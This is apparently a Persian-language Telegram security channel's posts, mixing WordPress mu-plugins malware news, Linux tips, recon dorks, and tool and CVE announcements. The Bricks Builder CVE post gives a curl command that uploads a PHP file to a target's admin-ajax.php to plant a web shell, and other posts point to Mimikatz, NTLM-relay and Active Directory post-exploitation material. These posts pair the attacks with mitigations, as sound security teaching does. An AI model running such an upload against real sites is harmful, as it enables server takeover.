دوستان درحال راه اندازی لابراتور برای شما هستم
و درگیر ترجمه یک کتاب که به زودی قرار میگیره
برای همین ممکنه فعلا پست آموزشی نباشه
با تشکر از صبر شما .
و درگیر ترجمه یک کتاب که به زودی قرار میگیره
برای همین ممکنه فعلا پست آموزشی نباشه
با تشکر از صبر شما .
🤩21❤3🔥1
درود دوستان عزیز
اگر از آموزشهای ما استفاده میکنید و دوست دارید از تلاش ما حمایت کنید، میتوانید از طریق لینک زیر کمک کوچکی به ما داشته باشید ❤:
https://daramet.com/TryHackBox
راستش را بخواهید، من همیشه از درخواست دونیت راحت نبودم، اما شرایطی پیش آمده که مجبورم این را امتحان کنم. امیدوارم شما دوستان درک کنید.
ممنون که همراه ما هستید.
اگر از آموزشهای ما استفاده میکنید و دوست دارید از تلاش ما حمایت کنید، میتوانید از طریق لینک زیر کمک کوچکی به ما داشته باشید ❤:
https://daramet.com/TryHackBox
راستش را بخواهید، من همیشه از درخواست دونیت راحت نبودم، اما شرایطی پیش آمده که مجبورم این را امتحان کنم. امیدوارم شما دوستان درک کنید.
ممنون که همراه ما هستید.
❤10👍1👏1
هکرها از یک قابلیت کمتر شناخته شده در وردپرس به نام Must Use Plugins (پلاگینهای ضروری) سوءاستفاده میکنند تا بدافزارها را نصب و از دید مدیران سایت پنهان کنند، در حالی که دسترسی دائمی از راه دور را حفظ میکنند.
قابلیت Must Use Plugins (mu-plugins) چیست؟
این ویژگی که با نام mu-plugins نیز شناخته میشود، در سال ۲۰۲۲ به سیستم مدیریت محتوای وردپرس اضافه شد. پلاگینهایی که در پوشه خاصی به نام /mu-plugins قرار میگیرند، بهصورت خودکار توسط وردپرس اجرا میشوند و نیازی به فعالسازی یا تأیید از طریق پیشخوان مدیریت ندارند.
این پلاگینها در بخش معمولی «پلاگینها» نمایش داده نمیشوند، بنابراین کاربران نمیتوانند بهصورت تصادفی آنها را غیرفعال یا حذف کنند. همین موضوع، این پوشه را به مکانی ایدهآل برای پنهانکردن بدافزارها تبدیل کرده است.
افزایش سوءاستفاده هکرها از mu-plugins
بر اساس گزارش گوَدَدی سیکوری (GoDaddy Sucuri)، هکرها حداقل از فوریه امسال از این قابلیت سوءاستفاده کردهاند و اکنون این فعالیت بهطور قابل توجهی افزایش یافته است.
هکرها با نفوذ به سایتهای وردپرس، بدافزارها را در پوشه mu-plugins قرار میدهند، چون میدانند که این کدها بهصورت خودکار اجرا شده و در پیشخوان سایت نمایش داده نمیشوند. علاوه بر این، از آنجا که این قابلیت نسبتاً ناشناخته است، بسیاری از ابزارهای امنیتی وردپرس حتی این پوشه را برای تهدیدات احتمالی اسکن نمیکنند.
نمونههایی از بدافزارهای کشفشده در mu-plugins
سیکوری متوجه شده است که هکرها از mu-plugins برای موارد زیر استفاده میکنند:
- نصب بکدورها و وبشلها
- قراردادن اسپم سئو در سایتهای هکشده
- تغییر مسیر ترافیک به سایتهای مخرب
برخی از فایلهای مخرب شناساییشده:
-
-
-
در این میان، فایل redirect.php خود را بهعنوان «بهروزرسانی مرورگر» جا میزند تا کاربران را فریب دهد و آنها را مجبور به نصب بدافزاری کند که میتواند دادهها را سرقت کند یا payloadهای اضافی را دانلود کند.
💢 هشدار به مالکان سایتهای وردپرس
این طیف گسترده از سوءاستفادهها نشان میدهد که این روش در حال محبوبشدن در بین گروههای هکری است که از این پوشه بهعنوان پایگاهی پایدار برای فعالیتهای مخرب استفاده میکنند.
توصیههای امنیتی:
✅ محتوای پوشه mu-plugins را بررسی کنید.
✅ اگر از پلاگینهای Must Use استفاده نمیکنید، آنها را حذف کنید.
✅ مطمئن شوید که حذف بهصورت دائمی انجام شده است.
با این اقدامات، میتوانید از سایت خود در برابر این تهدید پنهان محافظت کنید.
@TryHackBox
قابلیت Must Use Plugins (mu-plugins) چیست؟
این ویژگی که با نام mu-plugins نیز شناخته میشود، در سال ۲۰۲۲ به سیستم مدیریت محتوای وردپرس اضافه شد. پلاگینهایی که در پوشه خاصی به نام /mu-plugins قرار میگیرند، بهصورت خودکار توسط وردپرس اجرا میشوند و نیازی به فعالسازی یا تأیید از طریق پیشخوان مدیریت ندارند.
این پلاگینها در بخش معمولی «پلاگینها» نمایش داده نمیشوند، بنابراین کاربران نمیتوانند بهصورت تصادفی آنها را غیرفعال یا حذف کنند. همین موضوع، این پوشه را به مکانی ایدهآل برای پنهانکردن بدافزارها تبدیل کرده است.
افزایش سوءاستفاده هکرها از mu-plugins
بر اساس گزارش گوَدَدی سیکوری (GoDaddy Sucuri)، هکرها حداقل از فوریه امسال از این قابلیت سوءاستفاده کردهاند و اکنون این فعالیت بهطور قابل توجهی افزایش یافته است.
هکرها با نفوذ به سایتهای وردپرس، بدافزارها را در پوشه mu-plugins قرار میدهند، چون میدانند که این کدها بهصورت خودکار اجرا شده و در پیشخوان سایت نمایش داده نمیشوند. علاوه بر این، از آنجا که این قابلیت نسبتاً ناشناخته است، بسیاری از ابزارهای امنیتی وردپرس حتی این پوشه را برای تهدیدات احتمالی اسکن نمیکنند.
نمونههایی از بدافزارهای کشفشده در mu-plugins
سیکوری متوجه شده است که هکرها از mu-plugins برای موارد زیر استفاده میکنند:
- نصب بکدورها و وبشلها
- قراردادن اسپم سئو در سایتهای هکشده
- تغییر مسیر ترافیک به سایتهای مخرب
برخی از فایلهای مخرب شناساییشده:
-
wp-content/mu-plugins/redirect.php -
wp-content/mu-plugins/index.php -
wp-content/mu-plugins/custom-js-loader.php در این میان، فایل redirect.php خود را بهعنوان «بهروزرسانی مرورگر» جا میزند تا کاربران را فریب دهد و آنها را مجبور به نصب بدافزاری کند که میتواند دادهها را سرقت کند یا payloadهای اضافی را دانلود کند.
💢 هشدار به مالکان سایتهای وردپرس
این طیف گسترده از سوءاستفادهها نشان میدهد که این روش در حال محبوبشدن در بین گروههای هکری است که از این پوشه بهعنوان پایگاهی پایدار برای فعالیتهای مخرب استفاده میکنند.
توصیههای امنیتی:
✅ محتوای پوشه mu-plugins را بررسی کنید.
✅ اگر از پلاگینهای Must Use استفاده نمیکنید، آنها را حذف کنید.
✅ مطمئن شوید که حذف بهصورت دائمی انجام شده است.
با این اقدامات، میتوانید از سایت خود در برابر این تهدید پنهان محافظت کنید.
@TryHackBox
Sucuri Blog
Hidden Malware Strikes Again: Mu-Plugins Under Attack
Hidden malware strikes WordPress mu-plugins. Our latest findings reveal how to safeguard your site against these threats.
👍7
آسیبپذیری CVE-2024-25600 در پلاگین Bricks وردپرس
معرفی آسیبپذیری:
این یک آسیبپذیری اجرای کد از راه دور (RCE) بدون نیاز به احراز هویت در پلاگین Bricks Builder وردپرس (نسخههای 1.9.6 و قبلتر) است.
جزئیات فنی:
- مکانیسم حمله:
- از طریق یک درخواست AJAX کنترلنشده در
- امکان آپلود فایلهای PHP مخرب
- دسترسی کامل به سرور (web shell)
- کد آسیبپذیر:
نمونه اکسپلویت:
تأثیرات:
- نصب وبشل روی سرور
- دسترسی به پایگاه داده وردپرس
- امکان گسترش حمله به سایر سیستمها
راهکارهای مقابله:
1. فوری:
- ارتقاء به نسخه 1.9.7+
- غیرفعال کردن پلاگین تا زمان بهروزرسانی
2. پیشگیرانه:
- محدود کردن دسترسی به
- پیادهسازی WAF با قوانین مخصوص
تشخیص سوءاستفاده:
- بررسی لاگها برای درخواستهای غیرعادی به
- جستجوی فایلهای PHP جدید در دایرکتوری uploads
نکته اخلاقی:
این اطلاعات فقط برای اهداف آموزشی هست .
https://github.com/Chocapikk/CVE-2024-25600
#Cve
@TryHackBox
معرفی آسیبپذیری:
این یک آسیبپذیری اجرای کد از راه دور (RCE) بدون نیاز به احراز هویت در پلاگین Bricks Builder وردپرس (نسخههای 1.9.6 و قبلتر) است.
جزئیات فنی:
- مکانیسم حمله:
- از طریق یک درخواست AJAX کنترلنشده در
admin-ajax.php- امکان آپلود فایلهای PHP مخرب
- دسترسی کامل به سرور (web shell)
- کد آسیبپذیر:
// در فایل اصلی پلاگین
add_action('wp_ajax_bricks_upload', 'handle_file_upload');
// عدم وجود بررسیهای امنیتی کافی
نمونه اکسپلویت:
curl -X POST "http://target.com/wp-admin/admin-ajax.php" \
-F "action=bricks_upload" \
-F "file=@exploit.php"
تأثیرات:
- نصب وبشل روی سرور
- دسترسی به پایگاه داده وردپرس
- امکان گسترش حمله به سایر سیستمها
راهکارهای مقابله:
1. فوری:
- ارتقاء به نسخه 1.9.7+
- غیرفعال کردن پلاگین تا زمان بهروزرسانی
2. پیشگیرانه:
- محدود کردن دسترسی به
admin-ajax.php- پیادهسازی WAF با قوانین مخصوص
تشخیص سوءاستفاده:
- بررسی لاگها برای درخواستهای غیرعادی به
admin-ajax.php- جستجوی فایلهای PHP جدید در دایرکتوری uploads
نکته اخلاقی:
این اطلاعات فقط برای اهداف آموزشی هست .
https://github.com/Chocapikk/CVE-2024-25600
#Cve
@TryHackBox
GitHub
GitHub - Chocapikk/CVE-2024-25600: Unauthenticated Remote Code Execution – Bricks <= 1.9.6
Unauthenticated Remote Code Execution – Bricks <= 1.9.6 - Chocapikk/CVE-2024-25600
👍1
این دستور را در ترمینال خود وارد کنید:
⭕ توضیح :
این دستور اطلاعات دمایی قطعات سختافزاری سیستم شما را به صورت زنده (هر 1 ثانیه) نمایش میدهد، شامل:
- دمای پردازنده (CPU)
- دمای کارت گرافیک (GPU)
- دمای مودم وایفای (Wi-Fi)
- دمای حافظههای NVMe SSD
- دمای هارددیسکهای (HDD)
#### ویژگیهای دستور:
-
تغییرات را هایلایت میکند
-
بروزرسانی هر 1 ثانیه
-
ابزار اصلی خواندن سنسورهای سختافزاری
نکات فنی:
1. نیاز به نصب بسته
2. قبل از استفاده باید سنسورها را پیکربندی کنید:
3. برای سیستمهای مختلف ممکن است خروجی متفاوت باشد
#linux
@TryHackBox
watch -d -n 1 sensors
⭕ توضیح :
این دستور اطلاعات دمایی قطعات سختافزاری سیستم شما را به صورت زنده (هر 1 ثانیه) نمایش میدهد، شامل:
- دمای پردازنده (CPU)
- دمای کارت گرافیک (GPU)
- دمای مودم وایفای (Wi-Fi)
- دمای حافظههای NVMe SSD
- دمای هارددیسکهای (HDD)
#### ویژگیهای دستور:
-
-d:تغییرات را هایلایت میکند
-
-n 1: بروزرسانی هر 1 ثانیه
-
sensors: ابزار اصلی خواندن سنسورهای سختافزاری
نکات فنی:
1. نیاز به نصب بسته
lm-sensors دارد (در اوبونتو: sudo apt install lm-sensors)2. قبل از استفاده باید سنسورها را پیکربندی کنید:
sudo sensors-detect3. برای سیستمهای مختلف ممکن است خروجی متفاوت باشد
#linux
@TryHackBox
❤4
نکته سریع لینوکس: حذف پوشههای خالی
اگر میخواهید پوشههای خالی را حذف کنید، میتوانید از دستور
#### توضیح گزینهها:
-
فقط پوشهها (دایرکتوریها) را جستجو میکند
-
فقط پوشههای خالی را انتخاب میکند
-
دستور
روش جایگزین:
نکات مهم:
1.
فقط پوشههای کاملاً خالی را حذف میکند (حاوی هیچ فایل یا پوشه دیگری نباشند)
2. گزینه
3. نقطه (
مثال کاربردی:
اگر بخواهید پوشههای خالی را در مسیر
این دستورات برای تمیزکاری خودکار پوشهها و مدیریت فضای ذخیرهسازی بسیار مفید هستند.
#Linux #لینوکس
@TryHackBox
اگر میخواهید پوشههای خالی را حذف کنید، میتوانید از دستور
find استفاده کنید:find . -type d -empty -exec rmdir -v {} +#### توضیح گزینهها:
-
-type d: فقط پوشهها (دایرکتوریها) را جستجو میکند
-
-empty: فقط پوشههای خالی را انتخاب میکند
-
-exec rmdir -v {} +: دستور
rmdir را برای حذف پوشهها اجرا میکند و عملیات را نمایش میدهد (-v)روش جایگزین:
find . -type d -empty -delete
نکات مهم:
1.
rmdirفقط پوشههای کاملاً خالی را حذف میکند (حاوی هیچ فایل یا پوشه دیگری نباشند)
2. گزینه
-delete در روش دوم مستقیم پوشهها را حذف میکند3. نقطه (
.) در ابتدای دستور به معنای جستجو از پوشه جاری استمثال کاربردی:
اگر بخواهید پوشههای خالی را در مسیر
/home/user/docs حذف کنید:find /home/user/docs -type d -empty -delete
این دستورات برای تمیزکاری خودکار پوشهها و مدیریت فضای ذخیرهسازی بسیار مفید هستند.
#Linux #لینوکس
@TryHackBox
❤6👍2
در دستور find گزینه -exec وجود دارد که میتوان از آن برای فراخوانی یک ابزار خارجی و انجام عملیات خاص روی فایلهای منطبق با معیارهای جستجو استفاده کرد.
مثال:
این دستور برای انجام یک عمل یکسان روی چندین فایل در مکانهای مختلف مفید است.
در این مثال، دستور ls -lah برای نمایش اطلاعاتی مانند مجوزها و سایر متادادههای هر فایل یافتشده اجرا میشود.
- علامت {} بهعنوان جاینگهدار نام فایل عمل میکند و باید آخرین عنصر در لیست پارامترها باشد.
- علامت ; نشاندهنده پایان لیست پارامترهاست و باید با بکاسلش (\) محافظت شود، در غیر این صورت شل آن را تفسیر میکند.
همچنین میتوانید بهجای ; از + استفاده کنید تا پایان لیست پارامترها مشخص شود. بین + و {} باید فاصله وجود داشته باشد.
مثال با +:
همچنین میتوانید چندین دستور را با -exec در find اجرا کنید، مثلاً:
#نکته #لینوکس
@TryHackBox
مثال:
find ~/ -type f -exec ls -lah {} \;
این دستور برای انجام یک عمل یکسان روی چندین فایل در مکانهای مختلف مفید است.
در این مثال، دستور ls -lah برای نمایش اطلاعاتی مانند مجوزها و سایر متادادههای هر فایل یافتشده اجرا میشود.
- علامت {} بهعنوان جاینگهدار نام فایل عمل میکند و باید آخرین عنصر در لیست پارامترها باشد.
- علامت ; نشاندهنده پایان لیست پارامترهاست و باید با بکاسلش (\) محافظت شود، در غیر این صورت شل آن را تفسیر میکند.
همچنین میتوانید بهجای ; از + استفاده کنید تا پایان لیست پارامترها مشخص شود. بین + و {} باید فاصله وجود داشته باشد.
مثال با +:
find ~/ -type f -exec ls -lah {} +
همچنین میتوانید چندین دستور را با -exec در find اجرا کنید، مثلاً:
find . -name "*.txt" -exec wc {} \; -exec du -sh {} \;
#نکته #لینوکس
@TryHackBox
👍3❤1🔥1
🔎 یک دورک گوگل که همیشه و همهجا جواب میدهد
در عملیات شناسایی (Recon)، میتوانید از چیزی شبیه به این استفاده کنید:
© [COMPANY]. All rights reserved.
برای پیدا کردن تمام دامنههای اصلی مرتبط با یک شرکت در صورت نیاز، میتوانید نتایج نامرتبط را از خروجی جستجو حذف کنید.
توضیح:
- این روش از Google Dorking برای پیدا کردن صفحاتی استفاده میکند که شامل عبارت کپیرایت استاندارد شرکتها هستند.
- جایگزین کردن [COMPANY] با نام شرکت موردنظر (مثلاً © Google. All rights reserved.) میتواند دامنههای اصلی و ساب دامنههای آن را فاش کند.
- این تکنیک در جستجوی پیشرفته گوگل (Google Hacking) و مرحله شناسایی (Recon) برنامههای باگ بانتی مفید است.
#bugbounty #tips #recon
@TryHackBoc
در عملیات شناسایی (Recon)، میتوانید از چیزی شبیه به این استفاده کنید:
© [COMPANY]. All rights reserved.
برای پیدا کردن تمام دامنههای اصلی مرتبط با یک شرکت در صورت نیاز، میتوانید نتایج نامرتبط را از خروجی جستجو حذف کنید.
توضیح:
- این روش از Google Dorking برای پیدا کردن صفحاتی استفاده میکند که شامل عبارت کپیرایت استاندارد شرکتها هستند.
- جایگزین کردن [COMPANY] با نام شرکت موردنظر (مثلاً © Google. All rights reserved.) میتواند دامنههای اصلی و ساب دامنههای آن را فاش کند.
- این تکنیک در جستجوی پیشرفته گوگل (Google Hacking) و مرحله شناسایی (Recon) برنامههای باگ بانتی مفید است.
#bugbounty #tips #recon
@TryHackBoc
👍9🔥2❤1
قسمت چهارم رادیو زیروپاد - نحوه شناسایی یک کلاهبردار با استفاده…
@RadioZeroPod | @TryHackBoxStory
📖 قسمت چهارم رادیو زیروپاد
💠 نحوه شناسایی یک کلاهبردار با استفاده از اوسینت
🔶️ تا به حال فکر کرده اید که پشت این ایمیل ها چه کسی نشسته؟
🔶️ شروع کار: تعیین هدف
🔶️ بررسی اولیه: ردپای دیجیتال
🔶️ شروع بازی: ساخت یک چهره جعلی
🔶️ ابزارهای OSINT مخصوص پیپال
🔶️ نتیجهگیری: یک گزارش کامل
🔶️ چه سفر پرماجرایی!
🔶️ آموزش گامبهگام روشهای استفادهشده در داستان "فریب کلاهبردار با OSINT و مهندسی اجتماعی"
🔶️ ابزارهای مورد نیاز برای ساخت وبسایت بیخطر
🔶️ سخن پایانی
🧩 لینک برای خواندن مقاله :
Link
📼 با اجرای آریامهر
#RadioZeroPod
@TryHackBoxStory
@RadioZeroPod
💠 نحوه شناسایی یک کلاهبردار با استفاده از اوسینت
🔶️ تا به حال فکر کرده اید که پشت این ایمیل ها چه کسی نشسته؟
🔶️ شروع کار: تعیین هدف
🔶️ بررسی اولیه: ردپای دیجیتال
🔶️ شروع بازی: ساخت یک چهره جعلی
🔶️ ابزارهای OSINT مخصوص پیپال
🔶️ نتیجهگیری: یک گزارش کامل
🔶️ چه سفر پرماجرایی!
🔶️ آموزش گامبهگام روشهای استفادهشده در داستان "فریب کلاهبردار با OSINT و مهندسی اجتماعی"
🔶️ ابزارهای مورد نیاز برای ساخت وبسایت بیخطر
🔶️ سخن پایانی
🧩 لینک برای خواندن مقاله :
Link
📼 با اجرای آریامهر
#RadioZeroPod
@TryHackBoxStory
@RadioZeroPod
👍3
Forwarded from
آشنایی مقدماتی با mimikatz.pdf
1.1 MB
⭕ | آشنایی مقدماتی با Mimikatz
این کتاب به بررسی ابزار Mimikatz میپردازد که برای استخراج پسوردها و اعتبارنامهها از حافظه سیستم استفاده میشود. در این کتاب، شما با نحوه کار Mimikatz، قابلیتهای کلیدی آن، و نمونههایی از APT هکرها که از این ابزار استفاده کردهاند آشنا خواهید شد. همچنین، روشهای مقابله با Mimikatz و عبور از نرمافزارهای امنیتی نیز بررسی شده است.
لینک گیت هاب :
https://github.com/TryHackBox/Books
کانال آموزشی در تلگرام :
https://news.1rj.ru/str/TryHackBox
نویسنده : توییتر من :
https://www.x.com/kavehxnet
@KavehAPT
این کتاب به بررسی ابزار Mimikatz میپردازد که برای استخراج پسوردها و اعتبارنامهها از حافظه سیستم استفاده میشود. در این کتاب، شما با نحوه کار Mimikatz، قابلیتهای کلیدی آن، و نمونههایی از APT هکرها که از این ابزار استفاده کردهاند آشنا خواهید شد. همچنین، روشهای مقابله با Mimikatz و عبور از نرمافزارهای امنیتی نیز بررسی شده است.
لینک گیت هاب :
https://github.com/TryHackBox/Books
کانال آموزشی در تلگرام :
https://news.1rj.ru/str/TryHackBox
نویسنده : توییتر من :
https://www.x.com/kavehxnet
@KavehAPT
راهنمای_جامع_ابزار_Mimikatz_راهنمای_هکرها.pdf
4.4 MB
⭕ | راهنمای جامع ابزار Mimikatz
این کتاب به بررسی ابزار Mimikatz میپردازد که برای استخراج پسوردها، هشها و توکنهای دسترسی از حافظه سیستم استفاده میشود. در این کتاب، شما با تکنیکهای پایه تا پیشرفته Mimikatz آشنا خواهید شد، از جمله استخراج اعتبارنامهها، دور زدن مکانیزمهای امنیتی و افزایش دسترسی. همچنین، نمونههایی از حملات واقعی که از Mimikatz استفاده کردهاند و نحوه مقابله با این ابزار بررسی شده است.
گیت هاب :
https://github.com/TryHackBox/Books
کانال آموزشی در تلگرام :
https://news.1rj.ru/str/TryHackBox
نویسنده : توییتر من :
https://www.x.com/kavehxnet
@KavehAPT
این کتاب به بررسی ابزار Mimikatz میپردازد که برای استخراج پسوردها، هشها و توکنهای دسترسی از حافظه سیستم استفاده میشود. در این کتاب، شما با تکنیکهای پایه تا پیشرفته Mimikatz آشنا خواهید شد، از جمله استخراج اعتبارنامهها، دور زدن مکانیزمهای امنیتی و افزایش دسترسی. همچنین، نمونههایی از حملات واقعی که از Mimikatz استفاده کردهاند و نحوه مقابله با این ابزار بررسی شده است.
گیت هاب :
https://github.com/TryHackBox/Books
کانال آموزشی در تلگرام :
https://news.1rj.ru/str/TryHackBox
نویسنده : توییتر من :
https://www.x.com/kavehxnet
@KavehAPT
👍2
This media is not supported in your browser
VIEW IN TELEGRAM
🔎 یکی از ساده ترین راه ها برای پیدا کردن SQL injection با استفاده از جستجوی کد Github
➡️همان مثال برای SSRF:
#bugbounty #pentest #tips
@TryHackBox
@TryHackBoxOfficial
@TryHackBoxStory
@RadioZeroPod
➡️همان مثال برای SSRF:
/file_get_contents\(.*\$_GET|curl_exec\(.*\$_GET/
/(subprocess|exec|spawn|system).*chrome.*--headless/
#bugbounty #pentest #tips
@TryHackBox
@TryHackBoxOfficial
@TryHackBoxStory
@RadioZeroPod
👍7👏2🤩2🔥1
قسمت ششم رادیو زیرو پاد - داستان عجیب نوجوانانی که botnet میرای…
@RadioZeroPod | @TryHackBoxStory
📖 قسمت ششم رادیو زیرو پاد
💠 داستان عجیب نوجوانانی که botnet میرای را ساختند
🔶️ این داستان واقعی درباره نوجوانانی است که باتنت Mirai را ساختند.
🔶️ میرای توسط چند دانشجو توسعه داده شد که قصد داشتند به دانشگاه خود حمله DDOS انجام دهند. اما در نهایت، این باتنت تبدیل به بزرگترین باتنت IoT شد و سازندگانش دستگیر و زندانی شدند.
🔶️ جالب اینجاست که کد Mirai بسیار ساده و کمحجم بود و از تکنولوژی پیچیدهای استفاده نکرده بود. این باتنت تنها با ۳۱ ترکیب نام کاربری و رمز عبور گسترش یافت، اما همین مقدار هم کافی بود تا بیش از ۵۰۰ هزار دستگاه IoT را آلوده کند.
🧩 لینک برای خواندن مقاله :
Link
📼 با اجرای آریامهر
#RadioZeroPod
@TryHackBoxStory
@RadioZeroPod
💠 داستان عجیب نوجوانانی که botnet میرای را ساختند
🔶️ این داستان واقعی درباره نوجوانانی است که باتنت Mirai را ساختند.
🔶️ میرای توسط چند دانشجو توسعه داده شد که قصد داشتند به دانشگاه خود حمله DDOS انجام دهند. اما در نهایت، این باتنت تبدیل به بزرگترین باتنت IoT شد و سازندگانش دستگیر و زندانی شدند.
🔶️ جالب اینجاست که کد Mirai بسیار ساده و کمحجم بود و از تکنولوژی پیچیدهای استفاده نکرده بود. این باتنت تنها با ۳۱ ترکیب نام کاربری و رمز عبور گسترش یافت، اما همین مقدار هم کافی بود تا بیش از ۵۰۰ هزار دستگاه IoT را آلوده کند.
🧩 لینک برای خواندن مقاله :
Link
📼 با اجرای آریامهر
#RadioZeroPod
@TryHackBoxStory
@RadioZeroPod
👍3🔥3🙏1
Cable – A Post-Exploitation Toolkit For Active Directory Reconnaissance & Exploitation.
https://github.com/logangoins/Cable/
https://cybersecuritynews.com/cable-active-directory-toolkit/
@TryHackBox
https://github.com/logangoins/Cable/
https://cybersecuritynews.com/cable-active-directory-toolkit/
@TryHackBox
GitHub
GitHub - logangoins/Cable: .NET post-exploitation toolkit for Active Directory reconnaissance and exploitation
.NET post-exploitation toolkit for Active Directory reconnaissance and exploitation - logangoins/Cable
👍1
آیا TLS امن.pdf
1 MB
🔖 چگونه از WinRMS برای NTLM Relay استفاده کنیم؟
مقاله زیر ابتدا به توضیح درباره پروتکل WinRM و WinRMS پرداخته و سپس نحوه NTLM Relay و اجرای کد در سیستم قربانی از طریق این پروتکل را بیان میکند.
🔶️ Blog :
https://sensepost.com/blog/2025/is-tls-more-secure-the-winrms-case./
🔶️ impacket :
https://github.com/fortra/impacket/pull/1947
🔶️ Demo :
https://youtu.be/3mG2Ouu3Umk
➖➖➖➖➖➖➖
@TryHackBox
مقاله زیر ابتدا به توضیح درباره پروتکل WinRM و WinRMS پرداخته و سپس نحوه NTLM Relay و اجرای کد در سیستم قربانی از طریق این پروتکل را بیان میکند.
🔶️ Blog :
https://sensepost.com/blog/2025/is-tls-more-secure-the-winrms-case./
🔶️ impacket :
https://github.com/fortra/impacket/pull/1947
🔶️ Demo :
https://youtu.be/3mG2Ouu3Umk
➖➖➖➖➖➖➖
@TryHackBox
👍4
سیسکو تأیید میکند که برخی از محصولات آن تحت تأثیر آسیبپذیری بحرانی اجرای کد از راه دور در Erlang/OTP با شناسه CVE-2025-32433 قرار گرفتهاند.
این آسیبپذیری که توسط گروهی از محققان دانشگاه روهر در بوخوم (آلمان) کشف شده است، با شناسه CVE-2025-32433 ردیابی میشود و به عنوان مشکلی در پردازش پیامهای پروتکل SSH شرح داده میشود که ممکن است به یک مهاجم غیرمجاز اجازه دهد به سیستمهای آسیبپذیر دسترسی پیدا کرده و کد دلخواه اجرا کند.
محققان هشدار دادند که بهرهبرداری از این آسیبپذیری میتواند منجر به تسلط کامل میزبانها شود که به افراد ثالث اجازه میدهد به دادههای حساس دسترسی غیرمجاز پیدا کرده و آنها را دستکاری کنند، و همچنین حملات نوع DoS انجام دهند.
CVE-2025-32433
در نسخههای OTP-27.3.3، OTP-26.2.5.11 و OTP-25.3.2.20 اصلاح شده است. نسخههای قبلی تحت تأثیر قرار دارند.
چندی پس از اینکه وجود این آسیبپذیری آشکار شد، جامعه متخصصان امنیت سایبری دریافتند که بهرهبرداری از CVE-2025-32433 بسیار ساده است و جزئیات فنی و اسکریپتهای PoC ظرف ۲۴ ساعت عموماً در دسترس قرار گرفتند.
محققان Qualys معتقدند که پس از کشف این خطا، بسیاری از دستگاهها ممکن است در معرض حملات قرار بگیرند، با توجه به اینکه اکثر دستگاههای Cisco و Ericsson از Erlang استفاده میکنند.
هر سرویسی که از کتابخانه SSH Erlang/OTP برای دسترسی از راه دور استفاده میکند، مانند آنچه در دستگاههای OT/IoT و دستگاههای محاسبات لبه استفاده میشود، در معرض خطر هک قرار دارد.
Arctic Wolf
نیز تأثیر بالقوه را تحلیل کرد و اشاره کرد که علاوه بر Ericsson و Cisco که Erlang را با چندین محصول خود مرتبط کردهاند، این نرمافزار توسط National Instruments، Broadcom، EMQ Technologies، Very Technology، Apache Software Foundation و Riak Technologies نیز استفاده میشود.
با این حال، برای این شرکتها معمولاً نصب جداگانهای از Erlang/OTP مورد نیاز است.
در همین حال، Cisco ادامه میدهد تا تأثیر CVE-2025-32433 را ارزیابی کند و گسترهای از محصولات مربوط به مسیریابی، سوئیچینگ، محاسبات یکپارچه، مدیریت شبکه و برنامههای شبکه را بررسی کند.
در حال حاضر، شرکت به طور قطعی تأیید میکند که محصولات ConfD، Network Services Orchestrator (NSO)، Smart PHY، Intelligent Node Manager و Ultra Cloud Core تحت تأثیر قرار گرفتهاند.
غول شبکهای اشاره کرد که اگرچه ConfD و NSO (که انتظار میرود در ماه مه اصلاح شوند) تحت تأثیر آسیبپذیری قرار دارند، به دلیل پیکربندی خود، آسیبپذیری اجرای کد از راه دور در آنها وجود ندارد.
#cve
@TryHackBox
این آسیبپذیری که توسط گروهی از محققان دانشگاه روهر در بوخوم (آلمان) کشف شده است، با شناسه CVE-2025-32433 ردیابی میشود و به عنوان مشکلی در پردازش پیامهای پروتکل SSH شرح داده میشود که ممکن است به یک مهاجم غیرمجاز اجازه دهد به سیستمهای آسیبپذیر دسترسی پیدا کرده و کد دلخواه اجرا کند.
محققان هشدار دادند که بهرهبرداری از این آسیبپذیری میتواند منجر به تسلط کامل میزبانها شود که به افراد ثالث اجازه میدهد به دادههای حساس دسترسی غیرمجاز پیدا کرده و آنها را دستکاری کنند، و همچنین حملات نوع DoS انجام دهند.
CVE-2025-32433
در نسخههای OTP-27.3.3، OTP-26.2.5.11 و OTP-25.3.2.20 اصلاح شده است. نسخههای قبلی تحت تأثیر قرار دارند.
چندی پس از اینکه وجود این آسیبپذیری آشکار شد، جامعه متخصصان امنیت سایبری دریافتند که بهرهبرداری از CVE-2025-32433 بسیار ساده است و جزئیات فنی و اسکریپتهای PoC ظرف ۲۴ ساعت عموماً در دسترس قرار گرفتند.
محققان Qualys معتقدند که پس از کشف این خطا، بسیاری از دستگاهها ممکن است در معرض حملات قرار بگیرند، با توجه به اینکه اکثر دستگاههای Cisco و Ericsson از Erlang استفاده میکنند.
هر سرویسی که از کتابخانه SSH Erlang/OTP برای دسترسی از راه دور استفاده میکند، مانند آنچه در دستگاههای OT/IoT و دستگاههای محاسبات لبه استفاده میشود، در معرض خطر هک قرار دارد.
Arctic Wolf
نیز تأثیر بالقوه را تحلیل کرد و اشاره کرد که علاوه بر Ericsson و Cisco که Erlang را با چندین محصول خود مرتبط کردهاند، این نرمافزار توسط National Instruments، Broadcom، EMQ Technologies، Very Technology، Apache Software Foundation و Riak Technologies نیز استفاده میشود.
با این حال، برای این شرکتها معمولاً نصب جداگانهای از Erlang/OTP مورد نیاز است.
در همین حال، Cisco ادامه میدهد تا تأثیر CVE-2025-32433 را ارزیابی کند و گسترهای از محصولات مربوط به مسیریابی، سوئیچینگ، محاسبات یکپارچه، مدیریت شبکه و برنامههای شبکه را بررسی کند.
در حال حاضر، شرکت به طور قطعی تأیید میکند که محصولات ConfD، Network Services Orchestrator (NSO)، Smart PHY، Intelligent Node Manager و Ultra Cloud Core تحت تأثیر قرار گرفتهاند.
غول شبکهای اشاره کرد که اگرچه ConfD و NSO (که انتظار میرود در ماه مه اصلاح شوند) تحت تأثیر آسیبپذیری قرار دارند، به دلیل پیکربندی خود، آسیبپذیری اجرای کد از راه دور در آنها وجود ندارد.
#cve
@TryHackBox
Cisco
Cisco Security Advisory: Multiple Cisco Products Unauthenticated Remote Code Execution in Erlang/OTP SSH Server
On April 16, 2025, a critical vulnerability in the Erlang/OTP SSH server was disclosed. This vulnerability could allow an unauthenticated, remote attacker to perform remote code execution (RCE) on an affected device.
The vulnerability is due to a flaw in…
The vulnerability is due to a flaw in…
👍1
Try Hack Box
سیسکو تأیید میکند که برخی از محصولات آن تحت تأثیر آسیبپذیری بحرانی اجرای کد از راه دور در Erlang/OTP با شناسه CVE-2025-32433 قرار گرفتهاند. این آسیبپذیری که توسط گروهی از محققان دانشگاه روهر در بوخوم (آلمان) کشف شده است، با شناسه CVE-2025-32433 ردیابی…
